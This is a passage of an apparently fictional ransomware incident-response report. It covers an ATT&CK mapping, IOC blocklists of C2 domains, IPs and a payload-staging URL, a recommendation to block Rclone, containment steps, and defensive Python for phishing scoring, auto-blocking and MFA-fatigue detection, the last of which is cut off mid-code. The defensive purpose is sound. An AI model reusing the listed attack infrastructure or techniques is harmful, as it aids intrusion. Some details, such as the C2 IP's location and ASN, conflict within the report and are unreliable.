Known Domains: pioneer-updates.svc.net, update-cdn.ficsit-external.com, d3adbeef123456789.update.microsoft-cdn-verify.net (C2)
Extortion Model: Double extortion — data exfiltrated before encryption; payment demanded for both decryption key and non-publication of stolen data
Average Ransom: $250,000–$2.1M USD (historical range from disclosed incidents)
Intel Sources: abuse.ch Feodo Tracker, internal TIP, cross-industry threat sharing (TIP IOC-001–014)
Attribution Confidence: High — C2 IP overlap, IRONLOCK v2.1 signature, M.A.M. lure indicating prior OSINT on target

IRON CHIMNEY is a financially motivated RaaS group that leases its IRONLOCK ransomware platform to affiliates in exchange for a percentage of ransom proceeds. The group is notable for conducting detailed pre-attack reconnaissance on targets — typically gathering internal project names, key personnel, and network architecture before deploying lures. The M.A.M.-themed phishing content in this incident is consistent with this behavioral pattern.

The group has previously been observed targeting industrial research facilities and manufacturing operations where OT/SCADA data has high exfiltration value for secondary extortion. The inclusion of SCADA configuration exports in the staged data strongly suggests the attackers intended to use this data as additional leverage in ransom negotiations.

Section 06
MITRE ATT&CK Mapping
Tactic | Technique | ID | Observed Behavior
Reconnaissance | Gather Victim Org Info | T1591 | OSINT on M.A.M. project; Pioneer Division employee targeting; pre-attack credential phishing
Resource Dev. | Acquire Infrastructure: Domains | T1583.001 | pioneer-updates.svc.net, update-cdn.ficsit-external.com, ficsit-account-verify.com registered pre-attack
Initial Access | Phishing: Spearphishing Attachment | T1566.001 | MAM_Update_Q4_2026.xlsm delivered via AiTM proxy (THREAT-001)
Initial Access | Valid Accounts | T1078 | Session token replay post-AiTM interception; m.blake MFA compromise
Execution | User Execution: Malicious File | T1204.002 | Pioneer enabled macros on MAM_Update_Q4_2026.xlsm
Execution | Command and Scripting: PowerShell | T1059.001 | Encoded PowerShell download cradle; IRONLOCK deployment
Persistence | Scheduled Task/Job | T1053.005 | \Microsoft\Windows\Update\Updater scheduled task created by ransomware
Defense Evasion | Deobfuscate/Decode Files | T1140 | Base64-encoded PowerShell payloads
Defense Evasion | Masquerading | T1036 | pioneer_research_tool.exe; Update namespace scheduled task
Defense Evasion | Inhibit System Recovery | T1490 | VSS shadow copy deletion pre-encryption
Credential Access | OS Credential Dumping: LSASS | T1003.001 | Blocked LSASS dump attempt on PIONEER-WS-01 (DET-0040)
Credential Access | Brute Force: MFA Fatigue | T1110.003 | 3 consecutive MFA push denials then acceptance on m.blake (ALT-7285)
Discovery | System Network Configuration | T1016 | Subnet map exported via m.blake Admin Portal session
Discovery | Account Discovery | T1087 | User directory queries via m.blake session (6 calls)
Discovery | Remote System Discovery | T1018 | Host inventory API queries via m.blake session (14 calls)
Discovery | Network Service Scanning | T1046 | Internal nmap sweep (DET-0035)
Collection | Data Staged: Local Data Staging | T1074.001 | 3.2 GB R&D files staged to \RnD\tmp\archive_2026 (ALT-7299)
Collection | Automated Collection | T1119 | Bulk file staging across multiple R&D directories
C&C | Application Layer Protocol: Web | T1071.001 | HTTPS C2 beaconing to 185.220.101.47:443
Exfiltration | Exfil Over C2 Channel | T1041 | 547 MB exfiltrated via Rclone to C2 over port 443
Impact | Data Encrypted for Impact | T1486 | IRONLOCK v2.1 — 847 files encrypted in 238 seconds
Section 07
IOC Inventory

All IOCs below should be blocklisted at perimeter, NGFW, DNS resolver, email gateway, and endpoint layers. High-confidence IOCs are already pushed via SOAR PB-003. All hashes are SHA256.

Type | Value | Confidence | Description
IP Address | 185.220.101.47 | Confirmed | Primary C2 — Tor exit node, AS44901/Blazingfast LLC, Moscow. C2 beaconing, AiTM proxy, exfiltration destination. Listed on abuse.ch Feodo Tracker.
IP Address | 203.0.113.88 | Confirmed | MFA fatigue attack source for m.blake. Shares ASN with 185.220.101.47. Assessed as same threat actor infrastructure.
Domain | pioneer-updates.svc.net | Confirmed | AiTM phishing proxy domain. Registered 2026-05-21, 6 days pre-attack. Hosted on 185.220.101.47. Typosquat mimicking Ficsit Pioneer infrastructure.
Domain | update-cdn.ficsit-external.com | Confirmed | Payload staging domain for IRONLOCK download cradle. Registered 2026-05-24, 3 days pre-attack. Mimics Ficsit external CDN.
Domain | d3adbeef123456789.update.microsoft-cdn-verify.net | High | Known IRON CHIMNEY C2 domain from prior campaigns. DGA-style subdomain. Not observed in this incident but associated with same group.
Domain | ficsit-account-verify.com | Confirmed | Pre-attack credential phishing domain (THREAT-025, May 20). Registered pre-attack. Hosted on 185.220.101.47. Confirmed early reconnaissance phase.
File Hash | a3f8d4c2e1b9f0741d6c3a8b5e7f2d09c4b1e3a8f6d2c7b0e5a4f1d8c3b9e7 | Confirmed | pioneer_research_tool.exe — IRONLOCK v2.1 ransomware encryptor binary. Unsigned. Not in software inventory. AV: Trojan:Win32/IronLock.2.1
File Hash | b9c2e7f4a1d3e031c8f5a4b7e2d9c1f6a3b8e5d2c7f4a1b0e3d8c5f2a9b6e1 | Confirmed | README_DECRYPT.txt dropper — ransom note generator. Deposited in all directories containing encrypted files.
File Hash | a3f8c1d2e4b5a9f0c7e3d6b8a1f4c2e5d9b3a7f0c4e8d1b5a2f6c3e7d0b4a8 | Confirmed | MAM_Update_Q4_2026.xlsm — phishing attachment. AV: Trojan:X97M/Powerdrop.A, HEUR:Trojan.Script.Generic
Sched. Task | \Microsoft\Windows\Update\Updater | Confirmed | Persistence scheduled task created by IRONLOCK. Executes PowerShell payload on system startup and user logon. Removed by SOAR PB-003.
Email | updates@pioneer-updates.svc.net | Confirmed | Sending address for THREAT-001. Spoofed display name "Ficsit Research Platform." Blocklisted at email gateway.
Email | external@threatactor.net | High | External address that received outbound email from compromised pioneer account (THREAT-004). Threat actor controlled.
URL | hxxps://pioneer-updates[.]svc[.]net/portal/verify | Confirmed | AiTM phishing landing page. Proxied authentication to capture session tokens. Defanged for safe sharing.
URL | http://update-cdn[.]ficsit-external[.]com/mam/latest/update.ps1 | Confirmed | IRONLOCK payload staging URL. PowerShell download cradle target. Domain now sinkholed.
Account | m.blake@ficsit-pioneer.corp | Confirmed | Executive account compromised via MFA fatigue. Used for internal reconnaissance. Account suspended, sessions revoked, MFA re-enrollment forced.
Section 08
Affected Assets
Hostname | IP | Role | Impact | Status
RESEARCH-STATION-01 | 192.168.3.45 | R&D Workstation (primary ransomware target) | 847 files encrypted (.encrypted). VSS deleted. Scheduled task created. Ransom note dropped. | Isolated — forensic imaging in progress
PIONEER-WS-01 | 10.0.1.42 | Pioneer analyst workstation | 547 MB data exfiltrated. LSASS dump blocked. PowerShell cradle executed. 3.2 GB R&D files staged. | Under investigation — not yet isolated
FICSIT-HUB-CORE | | Central hub / admin portal | m.blake admin session established from external IP. Internal host inventory, user directory, subnet map exported. | Session terminated — no persistent access confirmed

Factory controllers (FACTORY-CTRL-NORTH, FACTORY-CTRL-SOUTH), domain controllers (FIC-DC-01), Exchange (FIC-EXCH-01), web server (FIC-WEB-01), and all other production systems were not affected. Network segmentation between the R&D segment and factory/production segments is assessed to have been the primary containment factor that prevented operational impact.

Section 09
Containment & Eradication Actions
Time | Action | By | Status
14:35 UTC | SOAR PB-003 triggered — ransomware containment playbook | Automated (SOAR) | Completed
14:37 UTC | SIEM investigation INV-2024-0087 opened; pioneer assigned | SIEM auto + pioneer | Completed
14:42 UTC | Ransomware binary confirmed unsigned; SHA256 submitted for analysis | pioneer | Completed
14:45 UTC | RESEARCH-STATION-01 network isolated from FICSIT-NET backbone | SOAR PB-003 / pioneer | Completed
14:47 UTC | m.blake account suspended; all sessions revoked; step-up auth enabled on Admin Portal | SOAR PB-002 / a.ficsit | Completed
14:47 UTC | pioneer account sessions revoked; MFA re-enrolled | SOAR PB-001 | Completed
14:50 UTC | C2 IP 185.220.101.47 blocklisted at NGFW; DNS sinkholed | SOAR PB-003 / SEC-013 | Completed
14:50 UTC | Phishing domain pioneer-updates.svc.net blocked at NGFW and email gateway | SOAR PB-001 | Completed
14:55 UTC | Staged R&D archive folder (RnD\tmp\archive_2026) quarantined pending investigation | pioneer | Completed
15:00 UTC | All IRON CHIMNEY IOCs pushed to email gateway, DNS, NGFW via threat intelligence feed | SOAR PB-003 | Completed
15:15 UTC | Ficsit Corp Security & Legal notified; executive briefing requested | pioneer / j.rodriguez | Completed
15:30 UTC | Forensic disk image of RESEARCH-STATION-01 initiated | IR team | In Progress
Pending | Full forensic review of PIONEER-WS-01 (exfiltration source) | Unassigned | Not Started
Pending | Quantify exact scope of exfiltrated data — identify all exfiltrated files | Unassigned | Not Started
Pending | Restore R&D files from pre-incident backup snapshot | Unassigned | Not Started
Pending | PDN-SRV-008 restore from backup (Queue: PLAT-008) | Unassigned | Not Started
Pending | Draft executive briefing for Ficsit Corp leadership | Unassigned | Not Started
Section 10
Automated SOAR Response

Three SOAR playbooks executed automatically during this incident, carrying out containment actions across multiple security controls within 30 to 90 seconds of each trigger, significantly faster than manual response would have permitted.

PB-001 — AiTM Phishing Response

Triggered at 10:09 UTC by ALT-7272 (AiTM Session Hijack). Executed 14 steps, including: revoking all active sessions for pioneer, blocking the phishing domain pioneer-updates.svc.net at the NGFW, quarantining THREAT-001 at the email gateway, raising the account risk score, notifying the SOC, filing the SIEM alert, opening an identity risk investigation, and forcing MFA re-enrollment. Completion time: approximately 45 seconds from trigger to final action.

PB-002 — MFA Fatigue Lockdown

Triggered at 14:10 UTC by ALT-7285 (MFA Failure Threshold breach on m.blake). Queued session monitoring; on ALT-7288 confirmation of successful compromise, executed 10 steps, including: suspending the m.blake account, revoking all sessions, enabling step-up authentication for all Admin Portal access, resetting all API tokens, flagging the account for investigation, and notifying the security team. Completion time: approximately 30 seconds from compromise confirmation.

PB-003 — Ransomware Containment

Triggered at 14:35 UTC by SIEM investigation auto-creation (correlated ALT-7291 + ALT-7287 + ALT-7278). Executed 12 steps, including: isolating RESEARCH-STATION-01 from the network fabric, pushing the C2 IP block to the NGFW, sinkholing C2 domains at DNS, quarantining the ransomware binary, preserving EDR telemetry and memory dumps, initiating the forensic imaging workflow, notifying the IR team and legal, pushing all IOCs to the threat intelligence platform, opening SOAR case CASE-2024-0267, and creating the post-incident review ticket in Queue (IR-002). Completion time: approximately 90 seconds from trigger.

Effective Automation
The combination of PB-001, PB-002, and PB-003 executed critical containment steps — network isolation, session revocation, IOC distribution — within 2 minutes of each trigger event. Without SOAR automation, these steps would have required 20–40 minutes of manual execution, potentially allowing further lateral movement or additional exfiltration.
Section 11
Related Incidents

The following investigations are directly linked to or correlated with INV-2024-0087 as part of the broader IRON CHIMNEY campaign against Ficsit Pioneer Division.

ID | Title | Relationship | Status
INV-2024-0086 | Suspected Account Takeover — m.blake (Executive) | Part of same IRON CHIMNEY campaign. IP 203.0.113.88 shares ASN with C2 185.220.101.47. m.blake session used for reconnaissance that informed IRONLOCK targeting. | Active
INV-2024-0081 | Suspicious Login — pioneer (After Hours, External IP) | 01:44 UTC after-hours session on pioneer account from VPN IP 92.118.37.91. Two R&D files accessed. May represent early attacker reconnaissance using previously obtained credentials, 8+ hours before main attack. | Investigating
INV-2024-0079 | Sensitive Data Staging — R&D Shared Drive | 3.2 GB of R&D files bulk-staged under pioneer account. Occurred while pioneer account was under review. High probability this was attacker-controlled activity under the compromised session. Possible pre-exfil staging for the 547 MB transfer at 14:28 UTC. | Investigating
INV-2024-0080 | Phishing Campaign — Engineering Division | Separate phishing campaign targeting 14 Engineering employees same day. Possible IRON CHIMNEY diversionary tactic or concurrent unrelated attack. Shares timing correlation but different infrastructure. | Investigating
Section 12
Root Cause Analysis
Primary Root Cause

The primary root cause was the successful delivery and execution of a macro-enabled Excel file (THREAT-001) by the pioneer account, combined with the absence of a Real-Time Outbound Blocking policy for confirmed C2 IPs identified by the IDS signature engine. AiTM session-token relay defeats OTP and push MFA by design: the second factor is relayed to the legitimate identity provider and only the resulting session cookie is stolen, so the factor itself is never "bypassed" in a way the IdP can see. Only phishing-resistant authentication (FIDO2 / hardware keys, whose assertions are bound to the legitimate origin) mitigates it.

Contributing Factors
C1
Macro Execution Permitted
Pioneer was able to enable and execute macros in a downloaded Excel file. Macro execution should be disabled by Group Policy for all users who do not have a documented business need for macros. An approved document exception process was not in place.
Critical
C2
Firewall Block Pending Manual Confirmation
The firewall alerted on 547 MB outbound to a known C2 IP but required manual rule confirmation before blocking. By the time SOAR PB-003 pushed the block rule, exfiltration had already completed. Outbound traffic to IDS-flagged C2 signatures should be automatically blocked.
Critical
C3
Standard TOTP/Push MFA Susceptible to AiTM and Fatigue
Both pioneer (AiTM session token theft) and m.blake (push fatigue) accounts were compromised despite MFA being enabled. Push-based MFA and TOTP cannot prevent AiTM attacks; FIDO2 / passkey-based authentication is required for phishing-resistant MFA.
High
C4
Admin Portal Accessible from External Networks
The Ficsit Admin Portal was accessible from external IPs without network-based access controls. The m.blake session was established directly from 203.0.113.88 (external/untrusted). Admin Portal access should require corporate VPN or a dedicated privileged access workstation.
High
C5
Outbound Rclone Not Detected or Blocked
Rclone (a legitimate cloud sync utility) was used for data exfiltration. Rclone is not standard Ficsit software and its execution should have been flagged by application allowlisting or DLP policies. Monitoring for unusual large outbound transfers should trigger immediate automated blocking.
High
C6
INV-2024-0081 Alert Not Escalated Promptly
The after-hours unauthorized login to the pioneer account at 01:44 UTC (INV-2024-0081) was not escalated or investigated prior to the main attack at 10:09 UTC. If this event had been acted upon — credentials rotated, session terminated — the attacker may have lost their initial foothold. After-hours logins from external/VPN IPs should trigger immediate analyst review with a 1-hour SLA.
High
Section 13
Recommendations
Immediate (0–72 hours)
R1
Complete Forensic Imaging of RESEARCH-STATION-01 and PIONEER-WS-01
Preserve all forensic evidence before any remediation. Full disk image, memory dump, and log collection. Chain of custody documentation required for potential legal proceedings.
Immediate
R2
Disable Office Macro Execution via Group Policy
Apply GPO to disable VBA macros in all Office applications for all endpoints where macros are not a documented business requirement. This single control would have prevented execution of the primary delivery mechanism.
Immediate
R3
Enable Automated Blocking for IDS C2 Signature Matches
Configure the NGFW to automatically block outbound traffic to IPs matching confirmed C2 signatures (priority 1 IDS alerts) without requiring manual confirmation. This should have blocked or significantly limited the exfiltration.
Immediate
R4
Assess All R&D Staff Credentials for Compromise
Given the after-hours access (INV-2024-0081) and AiTM success, assume all R&D staff credentials may have been harvested. Force password resets and MFA re-enrollment across the R&D division. Review for any additional compromised accounts.
Immediate
Short-Term (1–4 weeks)
R5
Deploy Phishing-Resistant MFA (FIDO2 / Passkeys)
Replace push-notification MFA with hardware security keys or passkeys for all privileged accounts (admin portal access, executive accounts, and R&D personnel). Push MFA is fundamentally vulnerable to both AiTM and fatigue attacks. Priority: executive accounts first, then privileged technical accounts.
High
R6
Restrict Admin Portal to Corporate VPN / PAW
Configure network-level access controls so the Ficsit Admin Portal is inaccessible from external IPs without first connecting via corporate VPN from a registered device. Privileged Access Workstations (PAWs) should be required for admin portal access by any privileged account.
High
R7
Implement Application Allowlisting on R&D Endpoints
Deploy application allowlisting (Windows Defender Application Control or equivalent) on all R&D workstations. pioneer_research_tool.exe was an unsigned binary not in the software inventory — application allowlisting would have prevented its execution entirely.
High
R8
Block Rclone and Unauthorized Cloud Sync Tools
Add Rclone binary signatures and known Rclone traffic patterns to DLP and NGFW block lists. Deploy endpoint application control to prevent execution of unauthorized file sync utilities. Rclone is consistently used by ransomware actors as an exfiltration tool.
High
R9
Tighten After-Hours Alert SLA to 1 Hour
INV-2024-0081 (after-hours login) was created at 01:44 UTC but not investigated until 08:05 UTC — over 6 hours later. Establish an on-call escalation procedure requiring analyst response to after-hours external logins within 1 hour. This may have enabled earlier credential rotation and prevented the main attack.
High
Strategic (1–6 months)
R10
Implement Immutable Offline Backup for R&D Data
Establish a 3-2-1-1 backup strategy (3 copies, 2 media types, 1 offsite, 1 offline immutable) for all R&D data. VSS deletion is a core ransomware capability, as this incident showed on RESEARCH-STATION-01, so VSS alone is not a sufficient recovery mechanism. An offline, immutable copy cannot be reached or deleted by ransomware running inside the network.
Medium
R11
Conduct Tabletop Exercise — Ransomware Scenario
Run a structured tabletop exercise for IR leadership, legal, and executive teams covering ransomware response, ransom payment decision-making, regulatory notification obligations, and public communications. The IRON CHIMNEY incident revealed gaps in the legal notification and executive escalation process.
Medium
R12
Deploy Email Link Detonation and AiTM-Aware Detection
Enable detonation sandbox analysis for all inbound email links. Deploy email gateway rules specifically designed to detect AiTM phishing proxy domains (domain age <7 days + DMARC misalignment + display name impersonation). The combination of these signals in THREAT-001 was detectable but not flagged prior to delivery.
Medium
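The three signals R12 lists can be evaluated before delivery from the message headers alone. As an added example, not Foyl MailGuard or Ficsit gateway configuration, the Python below scores a message on sender-domain age, DMARC alignment between the visible From domain and the domains that actually passed SPF/DKIM, and brand impersonation in the display name. Both sample messages are constructed (one modelled on THREAT-001's sender and display name, one on an internal notice); the domain-age table stands in for an RDAP/WHOIS lookup and its values, apart from the 6-day age ALT-7272 recorded for pioneer-updates.svc.net, are assumptions, as are the thresholds, the organisation domain list and the two-signal quarantine rule.

```python
"""Pre-delivery scoring for AiTM phishing lures (recommendation R12).

Added example for this report (not the Foyl MailGuard or Ficsit gateway rule
set): evaluates the three R12 signals on a parsed RFC 5322 message.
"""
import re
from email import message_from_string
from email.utils import parseaddr

ORG_DOMAINS = {"ficsit-pioneer.corp"}      # domains allowed to speak for Ficsit (assumed)
BRAND_TOKENS = ("ficsit", "pioneer")       # tokens an impersonating display name would use
MAX_DOMAIN_AGE_DAYS = 7

# Stand-in for an RDAP/WHOIS age lookup. The 6-day value is from ALT-7272; the
# rest are this example's assumptions. Unknown domains are not treated as young.
DOMAIN_AGE_DAYS = {"pioneer-updates.svc.net": 6, "ficsit-pioneer.corp": 4000}

# Constructed headers modelled on THREAT-001 (not the real message): SPF passes
# for a relay domain, DKIM is absent, so nothing authenticated aligns with From.
LURE = """\
Return-Path: <bounce@relay-out.example>
Authentication-Results: mx.ficsit-pioneer.corp; spf=pass smtp.mailfrom=relay-out.example;
 dkim=none; dmarc=none header.from=pioneer-updates.svc.net
From: "Ficsit Research Platform" <updates@pioneer-updates.svc.net>
To: pioneer@ficsit-pioneer.corp
Subject: MAM Update Q4 2026 - action required

Please review the attached update.
"""

# Constructed legitimate internal notice for contrast: aligned DKIM, old domain.
LEGIT = """\
Return-Path: <it-notices@ficsit-pioneer.corp>
Authentication-Results: mx.ficsit-pioneer.corp; spf=pass smtp.mailfrom=ficsit-pioneer.corp;
 dkim=pass header.d=ficsit-pioneer.corp; dmarc=pass header.from=ficsit-pioneer.corp
From: "Ficsit IT" <it-notices@ficsit-pioneer.corp>
To: pioneer@ficsit-pioneer.corp
Subject: Planned maintenance

Maintenance window Saturday.
"""


def domain_of(addr):
    return addr.rpartition("@")[2].lower()


def score_message(raw, domain_ages=DOMAIN_AGE_DAYS):
    """Return the per-signal results and a QUARANTINE/DELIVER verdict for one message."""
    msg = message_from_string(raw)
    display, addr = parseaddr(msg.get("From", ""))
    from_dom = domain_of(addr)
    # Unfold the Authentication-Results header so the regexes see one line.
    auth = " ".join(msg.get("Authentication-Results", "").split())

    # Signal 1: the visible sender domain was registered within the last week.
    age = domain_ages.get(from_dom)
    young = age is not None and age < MAX_DOMAIN_AGE_DAYS

    # Signal 2: DMARC misalignment. Collect the domains that actually passed
    # SPF (smtp.mailfrom) or DKIM (header.d) and compare them with From.
    authed = set()
    m = re.search(r"spf=pass\s+smtp\.mailfrom=([\w.-]+)", auth)
    if m:
        authed.add(m.group(1).lower())
    m = re.search(r"dkim=pass\s+header\.d=([\w.-]+)", auth)
    if m:
        authed.add(m.group(1).lower())
    dmarc_pass = "dmarc=pass" in auth
    misaligned = not dmarc_pass and from_dom not in authed

    # Signal 3: our brand in the display name, but a domain that is not ours.
    impersonating = (any(tok in display.lower() for tok in BRAND_TOKENS)
                     and from_dom not in ORG_DOMAINS)

    signals = {"young_domain": young, "dmarc_misaligned": misaligned,
               "display_name_impersonation": impersonating}
    verdict = "QUARANTINE" if sum(signals.values()) >= 2 else "DELIVER"
    return {"from_domain": from_dom, "domain_age_days": age,
            "signals": signals, "verdict": verdict}


if __name__ == "__main__":
    for name, raw in (("lure", LURE), ("legit", LEGIT)):
        r = score_message(raw)
        print(name, r["verdict"], r["signals"])
```

An attacker who publishes SPF and DKIM for the lure domain removes only the alignment signal; domain age and the impersonating display name still carry the verdict, which is why the rule requires two signals rather than all three.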
Appendix A
Key Evidence Logs

Selected log excerpts supporting the incident findings. Full logs preserved in forensic image (chain of custody: IR-EVID-2026-0087-A). Indicators appear here as logged; the consolidated list in Appendix B is defanged for distribution.

ALT-7291 — Ransomware File Extension Rename (EDR, RESEARCH-STATION-01)
CRITICAL
2026-05-27T14:31:02Z  RESEARCH-STATION-01  EDR-EVENT  severity=CRITICAL
  rule="Ransomware::FileExtMassRename"  process=pioneer_research_tool.exe
  pid=4892  user=FICSIT\pioneer  signed=false  cert_issuer=NONE
  hash_sha256=a3f8d4c2e1b9f0741d6c3a8b5e7f2d09c4b1e3a8f6d2c7b0e5a4f1d8c3b9e7
  file_op=RENAME  count=847  window_sec=238
  sample_renames:
    C:\Users\pioneer\Research\MAM-Notes-v4.docx → MAM-Notes-v4.docx.encrypted
    C:\Users\pioneer\Research\alien-consciousness-draft.pdf → ...pdf.encrypted
    C:\Users\pioneer\Research\scada-config-export.xlsx → ...xlsx.encrypted
  ransom_note: README_DECRYPT.txt  drop_path=C:\Users\pioneer\Research\
  scheduled_task: \Microsoft\Windows\Update\Updater  [persistence]
ALERT: action=QUARANTINE_PROCESS  result=SUCCESS  process_terminated=true
ALT-7287 — Large Outbound Transfer / Exfiltration (Firewall)
HIGH
May 27 14:28:11 FICSIT-FW-CORE CEF:0|FicsitSec|NGFW|4.2|1201|LargeOutbound|HIGH
  src=10.0.1.42 spt=50122 dst=185.220.101.47 dpt=443 proto=TCP
  bytes_out=573741824 bytes_in=1802 duration_sec=183
  geo_dst="NL/Tor exit node"  asn_dst=AS60068 (CDN77)
  rule_matched="Exfil::LargeOutbound>500MB"

May 27 14:31:18 FICSIT-FW-CORE IDS-ALERT:
  Signature 2025441 "ET TROJAN Ransomware C2 Beacon"
  src=10.0.1.42 dst=185.220.101.47 sid=2025441 priority=1
  action=ALERT  [NOT BLOCKED — manual confirmation pending]
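The two records above are exactly the case contributing factor C2 and recommendation R3 describe: the firewall saw the transfer and the IDS matched a priority-1 C2 signature, and neither action blocked. As an added example, not Ficsit SOAR or NGFW code, the Python below parses both records and produces the automatic block decision instead. One caveat the timestamps themselves show: the IDS alert is logged at 14:31:18, about three minutes after the LargeOutbound event at 14:28:11 whose recorded duration is 183 seconds, so a block keyed only to the IDS signature would still have arrived after this flow. The example therefore also blocks a LargeOutbound event whose destination already carries a C2 reputation, which per C2 was the firewall's state at the time. The year (syslog timestamps carry none), the `known_c2` reputation set and the returned field names are assumptions of this example.

```python
"""Real-time outbound blocking decision over NGFW telemetry.

Added example for this report (not Ficsit SOAR/NGFW code): parses the CEF
LargeOutbound event and the IDS alert from the ALT-7287 excerpt and decides
whether the destination should be blocked immediately, with no manual
confirmation step.
"""
import re
from datetime import datetime

# The two FICSIT-FW-CORE records from the ALT-7287 excerpt, verbatim.
NGFW_LOG = """\
May 27 14:28:11 FICSIT-FW-CORE CEF:0|FicsitSec|NGFW|4.2|1201|LargeOutbound|HIGH
  src=10.0.1.42 spt=50122 dst=185.220.101.47 dpt=443 proto=TCP
  bytes_out=573741824 bytes_in=1802 duration_sec=183
  geo_dst="NL/Tor exit node"  asn_dst=AS60068 (CDN77)
  rule_matched="Exfil::LargeOutbound>500MB"

May 27 14:31:18 FICSIT-FW-CORE IDS-ALERT:
  Signature 2025441 "ET TROJAN Ransomware C2 Beacon"
  src=10.0.1.42 dst=185.220.101.47 sid=2025441 priority=1
  action=ALERT  [NOT BLOCKED — manual confirmation pending]
"""

HEADER_RE = re.compile(r"^(\w{3} \d{1,2} \d{2}:\d{2}:\d{2}) (\S+) (.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')   # key=value or key="quoted value"
SIG_RE = re.compile(r'Signature (\d+) "([^"]+)"')


def parse_record(block, year=2026):
    """Parse one multi-line firewall record into a flat dict (year is assumed)."""
    lines = [ln.strip() for ln in block.strip().splitlines()]
    m = HEADER_RE.match(lines[0])
    if not m:
        raise ValueError(f"unrecognised header: {lines[0]!r}")
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    rec = {"ts": ts, "host": m.group(2), "kind": "unknown"}
    head, body = m.group(3), " ".join(lines[1:])
    if head.startswith("CEF:"):
        # CEF header: CEF:Version|Vendor|Product|Version|SignatureID|Name|Severity
        f = head.split("|")
        rec.update(kind="cef", vendor=f[1], product=f[2], sig_id=f[4],
                   name=f[5], severity=f[6])
    elif head.startswith("IDS-ALERT"):
        sig = SIG_RE.search(body)
        rec.update(kind="ids", sig_id=sig.group(1), name=sig.group(2))
    # Extension key=value pairs; free text such as "(CDN77)" is ignored.
    rec.update({k: v.strip('"') for k, v in KV_RE.findall(body)})
    return rec


def parse_records(text, year=2026):
    return [parse_record(b, year) for b in re.split(r"\n\s*\n", text.strip())]


def decide_block(records, known_c2=frozenset(), large_bytes=500 * 2**20):
    """Return {dst_ip: decision} for destinations that warrant an immediate block.

    Policy (what C2/R3 ask for): any priority-1 IDS alert blocks its destination
    with no human in the loop, and a LargeOutbound event to a destination that
    already carries a C2 reputation blocks as well, so the decision does not
    wait for a later beacon signature.
    """
    decisions = {}
    for r in records:
        dst = r.get("dst")
        reason = None
        if r["kind"] == "ids" and r.get("priority") == "1":
            reason = f"priority-1 IDS sid {r['sig_id']} ({r['name']}) at {r['ts']:%H:%M:%S}"
        elif (r["kind"] == "cef" and r.get("name") == "LargeOutbound"
              and int(r.get("bytes_out", 0)) >= large_bytes and dst in known_c2):
            reason = f"{int(r['bytes_out']) // 2**20} MiB to known C2 at {r['ts']:%H:%M:%S}"
        if dst is None or reason is None:
            continue
        d = decisions.setdefault(dst, {"action": "BLOCK", "sources": set(),
                                       "trigger_ts": r["ts"], "reasons": []})
        d["sources"].add(r.get("src"))
        d["trigger_ts"] = min(d["trigger_ts"], r["ts"])  # earliest record justifying the block
        d["reasons"].append(reason)
    for d in decisions.values():
        d["corroborated"] = len(d["reasons"]) > 1
    return decisions


if __name__ == "__main__":
    for ip, d in decide_block(parse_records(NGFW_LOG), known_c2={"185.220.101.47"}).items():
        print(ip, d["action"], f"{d['trigger_ts']:%H:%M:%S}", "; ".join(d["reasons"]))
```

Run without a `known_c2` set, the decision still blocks 185.220.101.47 on the IDS alert alone, but the trigger time moves from 14:28:11 to 14:31:18; that three-minute gap is the difference the reputation-based rule makes.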
ALT-7272 — AiTM Session Hijack (Foyl MailGuard / Entra ID)
HIGH
2026-05-27T10:09:14Z  Foyl-MailGuard  ATO-DETECT  severity=HIGH
  victim=pioneer@ficsit-pioneer.corp  proxy_ip=185.220.101.47
  phishing_domain=pioneer-updates.svc.net  domain_age=6d
  phishing_email=THREAT-001  attachment=MAM_Update_Q4_2026.xlsm
  session_cookie_stolen=true  mfa_bypassed=true [AiTM token relay]
  entra_ato_case=ATO-001  risk_score=94
  rule="Identity::AiTM_Session_Hijack"  soar_trigger=PB-001
ALT-7288 — m.blake Admin Portal Compromise (Entra ID)
HIGH
{"time":"2026-05-27T14:17:33Z","category":"SignInLogs",
 "userPrincipalName":"m.blake@ficsit-pioneer.corp","ipAddress":"203.0.113.88",
 "appDisplayName":"Ficsit Admin Portal","status":{"errorCode":0},
 "authMethod":"Microsoft Authenticator","succeeded":true,
 "riskDetail":"adminConfirmedSigninCompromised","riskLevelDuringSignin":"high"}

SESSION ACTIVITY (session_id=bae941f2, duration=22min):
  14:17:55  GET /api/v1/inventory/hosts?limit=500   200  (×14)
  14:18:30  GET /api/v1/directory/users?format=full 200  (×6)
  14:20:11  GET /api/v1/network/subnet-map          200  (×1)
ALERT: EntraID::SuccessAfterMFABurst  session_id=bae941f2  api_calls=21
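The EntraID::SuccessAfterMFABurst alert above is the pattern PB-002 acts on. As an added example, not Ficsit's detection content, the Python below reconstructs that logic over Entra ID sign-in records: a successful sign-in for an account that was preceded, within ten minutes, by five or more AADSTS500121 results (the strong-authentication request failed, which is what denied or timed-out pushes produce). The seven denied-push records and the benign second user are constructed for the example; the success record is the ALT-7288 entry as logged. The threshold, window and returned field names are assumptions.

```python
"""Success-after-MFA-burst detection over Entra ID sign-in logs.

Added example for this report (not Ficsit's Entra ID or SOAR logic): flags a
successful sign-in that follows a burst of failed MFA pushes for the same
account inside a short window, the m.blake pattern behind ALT-7285/ALT-7288.
"""
import json
from datetime import datetime, timedelta

# AADSTS500121: the strong-authentication request failed (push denied / timed out).
MFA_FAILED = "500121"

# Constructed sample: seven denied pushes from 203.0.113.88 between 14:10 and
# 14:16 (invented), then the ALT-7288 success record as logged, plus a benign
# user (invented) who declined one accidental push and then signed in normally.
SIGNIN_LOG = [
    *(json.dumps({"time": f"2026-05-27T14:1{t}Z", "category": "SignInLogs",
                  "userPrincipalName": "m.blake@ficsit-pioneer.corp",
                  "ipAddress": "203.0.113.88", "appDisplayName": "Ficsit Admin Portal",
                  "status": {"errorCode": 500121}, "succeeded": False})
      for t in ("0:02", "0:41", "1:27", "2:10", "3:55", "5:08", "6:40")),
    '{"time":"2026-05-27T14:17:33Z","category":"SignInLogs",'
    '"userPrincipalName":"m.blake@ficsit-pioneer.corp","ipAddress":"203.0.113.88",'
    '"appDisplayName":"Ficsit Admin Portal","status":{"errorCode":0},'
    '"authMethod":"Microsoft Authenticator","succeeded":true,'
    '"riskDetail":"adminConfirmedSigninCompromised","riskLevelDuringSignin":"high"}',
    json.dumps({"time": "2026-05-27T14:12:00Z", "category": "SignInLogs",
                "userPrincipalName": "t.nguyen@ficsit-pioneer.corp", "ipAddress": "10.0.1.77",
                "appDisplayName": "Outlook", "status": {"errorCode": 500121}, "succeeded": False}),
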